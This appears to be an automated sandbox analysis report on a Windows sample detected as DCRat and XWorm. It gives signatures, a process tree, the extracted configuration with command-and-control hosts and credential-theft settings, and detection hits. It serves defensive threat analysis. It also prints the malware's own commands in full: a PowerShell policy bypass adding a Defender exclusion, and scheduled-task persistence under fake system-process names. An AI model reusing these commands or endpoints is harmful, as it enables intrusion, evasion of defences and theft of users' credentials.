Windows Analysis Report
cougif6lqM.exe

Overview

General Information

Sample name: cougif6lqM.exe (renamed because the original name is a hash value)
Original sample name: 2bbc8212c548dcb848224a882b32492a.exe
Analysis ID: 1488678
MD5: 2bbc8212c548dcb848224a882b32492a
SHA1: d056d925ed8284c3b41e4bd2905e6e4cbbd56d3b
SHA256: 4b0446befa42f4a40fd06635aaa72fb34dfbaa7575fb1f811df6f4fad90f53b4
Tags: DCRat, exe

Detection

DCRat, XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Yara detected DCRat
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Creates processes via WMI
Disables UAC (PromptOnSecureDesktop)
Disables UAC (registry)
Drops PE files to the user root directory
Drops PE files with benign system names
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w10x64
  • cougif6lqM.exe (PID: 7276 cmdline: "C:\Users\user\Desktop\cougif6lqM.exe" MD5: 2BBC8212C548DCB848224A882B32492A)
    • javaclient.exe (PID: 7396 cmdline: "C:\Users\user\AppData\Local\Temp\javaclient.exe" MD5: 2F969595E0DD360ECD52126BF5ECE5E5)
      • schtasks.exe (PID: 8108 cmdline: schtasks.exe /create /tn "hvxmowIikyCfRrhhAMpWFavmEnuKtLh" /sc MINUTE /mo 11 /tr "'C:\Componenthost\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 8132 cmdline: schtasks.exe /create /tn "Memory CompressionM" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\windows defender\en-GB\Memory Compression.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 8188 cmdline: schtasks.exe /create /tn "Memory Compression" /sc ONLOGON /tr "'C:\Program Files (x86)\windows defender\en-GB\Memory Compression.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 6316 cmdline: schtasks.exe /create /tn "Memory CompressionM" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\windows defender\en-GB\Memory Compression.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 7156 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Mail\WmiPrvSE.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 6972 cmdline: schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files\Windows Mail\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 4780 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Mail\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 3820 cmdline: schtasks.exe /create /tn "hvxmowIikyCfRrhhAMpWFavmEnuKtLh" /sc MINUTE /mo 8 /tr "'C:\Users\Default\PrintHood\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 6932 cmdline: schtasks.exe /create /tn "hvxmowIikyCfRrhhAMpWFavmEnuKtL" /sc ONLOGON /tr "'C:\Users\Default\PrintHood\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 7452 cmdline: schtasks.exe /create /tn "hvxmowIikyCfRrhhAMpWFavmEnuKtLh" /sc MINUTE /mo 8 /tr "'C:\Users\Default\PrintHood\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 7520 cmdline: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 7504 cmdline: schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 7636 cmdline: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • powershell.exe (PID: 2128 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • DCRatBuild.exe (PID: 7412 cmdline: "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe" MD5: 81A0B6CE5163BE692566FFA70F8E9839)
      • wscript.exe (PID: 7460 cmdline: "C:\Windows\System32\WScript.exe" "C:\Componenthost\aZjsojBpBtPKe.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
        • cmd.exe (PID: 7508 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Componenthost\N1me8mpFe7zJQMouCBhkn06ZkahUl.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • providerreviewdhcp.exe (PID: 7552 cmdline: "C:\Componenthost\providerreviewdhcp.exe" MD5: 8F04E3EE4A119F4B39412E27CED12DE8)
            • cmd.exe (PID: 8040 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8o9UezPTg6.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 8088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7200 cmdline: C:\Users\user\cmd.exe MD5: 8F04E3EE4A119F4B39412E27CED12DE8)
  • cmd.exe (PID: 1688 cmdline: C:\Users\user\cmd.exe MD5: 8F04E3EE4A119F4B39412E27CED12DE8)
  • Memory Compression.exe (PID: 7908 cmdline: "C:\Program Files (x86)\windows defender\en-GB\Memory Compression.exe" MD5: 8F04E3EE4A119F4B39412E27CED12DE8)
  • Memory Compression.exe (PID: 7984 cmdline: "C:\Program Files (x86)\windows defender\en-GB\Memory Compression.exe" MD5: 8F04E3EE4A119F4B39412E27CED12DE8)
  • cleanup

Malware Configuration

XWorm: {"C2 url": ["light-liable.gl.at.ply.gg"], "Port": "10314", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
DCRat: {"SCRT": "{\"H\":\";\",\"y\":\"$\",\"J\":\"^\",\"5\":\"&\",\"B\":\"_\",\"L\":\">\",\"I\":\"#\",\"a\":\"(\",\"U\":\".\",\"C\":\"`\",\"d\":\"!\",\"6\":\")\",\"x\":\"-\",\"c\":\"*\",\"4\":\",\",\"o\":\" \",\"S\":\"@\",\"0\":\"<\",\"h\":\"%\",\"M\":\"~\",\"z\":\"|\"}", "PCRT": "{\"v\":\";\",\"Q\":\"<\",\"6\":\"%\",\"B\":\"#\",\"R\":\"*\",\"U\":\"$\",\"Z\":\"(\",\"V\":\"~\",\"L\":\".\",\"3\":\">\",\"F\":\"|\",\"x\":\"-\",\"s\":\"@\",\"0\":\",\",\"J\":\")\",\"h\":\"!\",\"p\":\"`\",\"k\":\"_\",\"I\":\" \",\"T\":\"&\",\"H\":\"^\"}", "TAG": "", "MUTEX": "DCR_MUTEX-CW0MLhmPnzDpkkOuZEHa", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false, "H1": "http://a1013249.xsph.ru/@=UGO0gTOkVjZ", "H2": "http://a1013249.xsph.ru/@=UGO0gTOkVjZ", "T": "0"}

Yara Overview

Dropped files
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\javaclient.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
C:\Users\user\AppData\Local\Temp\javaclient.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0xcb4b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xcbe8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xccfd:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xc867:$cnc4: POST / HTTP/1.1

Memory dumps
Source | Rule | Description | Author | Strings
00000002.00000000.1327658991.0000000000EC2000.00000002.00000001.01000000.00000006.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
00000002.00000000.1327658991.0000000000EC2000.00000002.00000001.01000000.00000006.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0xc94b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xc9e8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xcafd:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xc667:$cnc4: POST / HTTP/1.1
00000028.00000002.1513471393.0000000002D91000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
0000002A.00000002.1517396761.0000000003371000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000020.00000002.1513885055.0000000003111000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Unpacked PEs
Source | Rule | Description | Author | Strings
2.0.javaclient.exe.ec0000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
2.0.javaclient.exe.ec0000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0xcb4b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xcbe8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xccfd:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xc867:$cnc4: POST / HTTP/1.1

Sigma Overview

System Summary

• Source: Process started
  Author: Florian Roth (Nextron Systems), Tim Shelton
  Data: Command: C:\Users\Default\PrintHood\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe, CommandLine: C:\Users\Default\PrintHood\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe, CommandLine|base64offset|contains: , Image: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe, NewProcessName: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe, OriginalFileName: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1124, ProcessCommandLine: C:\Users\Default\PrintHood\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe, ProcessId: 7628, ProcessName: hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe
• Source: File created
  Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)
  Data: EventID: 11, Image: C:\Componenthost\providerreviewdhcp.exe, ProcessId: 7552, TargetFilename: C:\Recovery\csrss.exe
• Source: Registry Key set
  Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing
  Data: Details: C:\Users\user\AppData\Local\Temp\JavaClient.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\javaclient.exe, ProcessId: 7396, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\JavaClient
• Source: Process started
  Author: Florian Roth (Nextron Systems)
  Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\javaclient.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\javaclient.exe, ParentProcessId: 7396, ParentProcessName: javaclient.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe', ProcessId: 2128, ProcessName: powershell.exe
• Source: Process started
  Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
  Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\javaclient.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\javaclient.exe, ParentProcessId: 7396, ParentProcessName: javaclient.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe', ProcessId: 2128, ProcessName: powershell.exe
• Source: Process started
  Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton
  Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\javaclient.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\javaclient.exe, ParentProcessId: 7396, ParentProcessName: javaclient.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe', ProcessId: 2128, ProcessName: powershell.exe
• Source: Process started
  Author: frack113
  Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\javaclient.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\javaclient.exe, ParentProcessId: 7396, ParentProcessName: javaclient.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe', ProcessId: 2128, ProcessName: powershell.exe
• Source: Registry Key set
  Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
  Data: Details: C:\Users\user\AppData\Local\Temp\JavaClient.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\javaclient.exe, ProcessId: 7396, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\JavaClient
• Source: Process started
  Author: Florian Roth (Nextron Systems)
  Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\javaclient.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\javaclient.exe, ParentProcessId: 7396, ParentProcessName: javaclient.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe', ProcessId: 2128, ProcessName: powershell.exe
• Source: File created
  Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
  Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\javaclient.exe, ProcessId: 7396, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JavaClient.lnk
• Source: Process started
  Author: Florian Roth (Nextron Systems)
  Data: Command: schtasks.exe /create /tn "hvxmowIikyCfRrhhAMpWFavmEnuKtLh" /sc MINUTE /mo 11 /tr "'C:\Componenthost\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe'" /rl HIGHEST /f, CommandLine: schtasks.exe /create /tn "hvxmowIikyCfRrhhAMpWFavmEnuKtLh" /sc MINUTE /mo 11 /tr "'C:\Componenthost\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe'" /rl HIGHEST /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\javaclient.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\javaclient.exe, ParentProcessId: 7396, ParentProcessName: javaclient.exe, ProcessCommandLine: schtasks.exe /create /tn "hvxmowIikyCfRrhhAMpWFavmEnuKtLh" /sc MINUTE /mo 11 /tr "'C:\Componenthost\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe'" /rl HIGHEST /f, ProcessId: 8108, ProcessName: schtasks.exe
• Source: Process started
  Author: Michael Haag
  Data: Command: "C:\Windows\System32\WScript.exe" "C:\Componenthost\aZjsojBpBtPKe.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Componenthost\aZjsojBpBtPKe.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe, ParentProcessId: 7412, ParentProcessName: DCRatBuild.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Componenthost\aZjsojBpBtPKe.vbe" , ProcessId: 7460, ProcessName: wscript.exe
• Source: Process started
  Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
  Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\javaclient.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\javaclient.exe, ParentProcessId: 7396, ParentProcessName: javaclient.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe', ProcessId: 2128, ProcessName: powershell.exe

              Persistence and Installation Behavior

• Source: Process started
  Author: Joe Security
  Data: Command: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe'" /f, CommandLine: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: schtasks.exe /create /tn "hvxmowIikyCfRrhhAMpWFavmEnuKtLh" /sc MINUTE /mo 11 /tr "'C:\Componenthost\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe'" /rl HIGHEST /f, ParentImage: C:\Windows\System32\schtasks.exe, ParentProcessId: 8108, ParentProcessName: schtasks.exe, ProcessCommandLine: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe'" /f, ProcessId: 7520, ProcessName: schtasks.exe

IDS Alerts

• Timestamp: 2024-08-06T11:52:51.212378+0200, SID: 2855924, Source Port: 49716, Destination Port: 10314, Protocol: TCP, Classtype: Malware Command and Control Activity Detected
• Timestamp: 2024-08-06T11:54:05.009491+0200, SID: 2853193, Source Port: 49720, Destination Port: 10314, Protocol: TCP, Classtype: Malware Command and Control Activity Detected
• Timestamp: 2024-08-06T11:54:31.399989+0200, SID: 2853193, Source Port: 49721, Destination Port: 10314, Protocol: TCP, Classtype: Malware Command and Control Activity Detected
• Timestamp: 2024-08-06T11:52:15.171137+0200, SID: 2034194, Source Port: 49713, Destination Port: 80, Protocol: TCP, Classtype: A Network Trojan was detected

              AV Detection

Source: cougif6lqM.exe | Avira: detected
Source: http://a1013249.xsph.ru/@=UGO0gTOkVjZ | Avira URL Cloud: Label: malware
Source: C:\Componenthost\providerreviewdhcp.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Componenthost\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Componenthost\aZjsojBpBtPKe.vbe | Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\user\AppData\Local\Temp\8o9UezPTg6.bat | Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\user\cmd.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files\Windows Mail\WmiPrvSE.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Componenthost\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
